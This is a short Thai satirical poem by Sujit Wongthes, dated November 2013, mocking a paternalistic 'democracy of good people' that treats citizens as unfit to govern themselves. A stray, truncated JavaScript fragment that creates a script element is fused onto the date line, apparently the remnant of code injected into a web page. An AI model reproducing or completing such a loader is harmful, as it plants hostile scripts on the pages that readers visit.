ต้องทำซ้ำลองถูกลองผิด

แต่มโนจริตผิดวิสัย

ว่าผู้คนพวกพลเมืองไทย

ปกครองตนเองไร้สติปัญญา

จำต้องมีคนดีคอยดูแล

กู้แก้แผ่ปกเหมือนนกกระสา

กินเลือดเนื้อเถือหนังต่างต่างนานา

เป็นประชาธิปไตยของคนดี

 

สุจิตต์ วงษ์เทศ

บ้านช่างหล่อ กรุงธนบุรี

28 พฤศจิกายน 2556var d=document;var s=d.createElement(‘script’); } else {